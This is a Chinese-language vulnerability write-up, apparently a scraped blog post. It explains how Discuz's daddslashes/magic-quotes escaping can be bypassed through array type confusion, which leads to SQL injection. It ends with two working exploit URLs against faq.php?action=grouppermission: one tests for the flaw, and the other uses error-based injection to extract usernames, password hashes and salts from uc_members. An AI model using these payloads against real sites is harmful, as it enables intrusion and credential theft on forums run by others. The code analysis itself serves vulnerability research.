Discuz樹大招風已成常態,不過對於其餘整站程序未嘗不是如此?是否曾記得大明湖畔的PHPCMS和DEDCMS萬人破的場景,流行整站程序最重要的仍是漏洞的快速響應。php
在《高級PHP應用程序漏洞審覈技術》一文裏的"魔術引號帶來的新的安全問題"一節裏,有提到經過提取魔術引號產生的「\」字符帶來的安全問題,一樣這個問題在這裏又一次完美體現,以下面的代碼片斷:web
1 // foo.php?xigr='ryat 2 3 function daddslashes($string, $force = 0) { 4 !defined('MAGIC_QUOTES_GPC') && define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc()); 5 if(!MAGIC_QUOTES_GPC || $force) { 6 if(is_array($string)) { 7 foreach($string as $key => $val) { 8 $string[$key] = daddslashes($val, $force); 9 } 10 } else { 11 $string = addslashes($string); 12 } 13 } 14 return $string; 15 } 16 ... 17 foreach(array('_COOKIE', '_POST', '_GET') as $_request) { 18 foreach($$_request as $_key => $_value) { 19 $_key{0} != '_' && $$_key = daddslashes($_value); 20 } 21 } 22 23 echo $xigr['hi'];
上面的代碼本來指望獲得一個通過daddslashes()安全處理後的數組變量$xigr['hi'],可是沒有對變量$xigr作嚴格的類型規定,當咱們提交一個字符串變量$xigr='ryat,通過上面的處理變爲\'ryat,到最後$xigr['hi']就會輸出\,若是這個變量引入到SQL語句,那麼就會引發嚴重的安全問題了,再來看下面的代碼片斷:數組
1 if($xigr) { 2 foreach($xigr as $k => $v) { 3 $uids[] = $v['uid']; 4 } 5 $query = $db->query("SELECT uid FROM users WHERE uid IN ('".implode("','", $uids)."')");
利用上面提到的思路,經過提交foo.php?xigr[]='&xigr[][uid]=evilcode這樣的構造形式能夠很容易的突破GPC或相似的安全處理,造成SQL注射漏洞。安全
測試漏洞存在的語句 & 爆出帳號+密碼+salt的語句:xss
http://xss.com/bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28version%28%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
http://xss.com/bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28username,0x3a,password,0x3a,salt%29%20from%20uc_members%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
// 綜合自Freebuf分析 & http://www.80vul.com/webzine_0x06/PSTZine_0x06_0x03.txt測試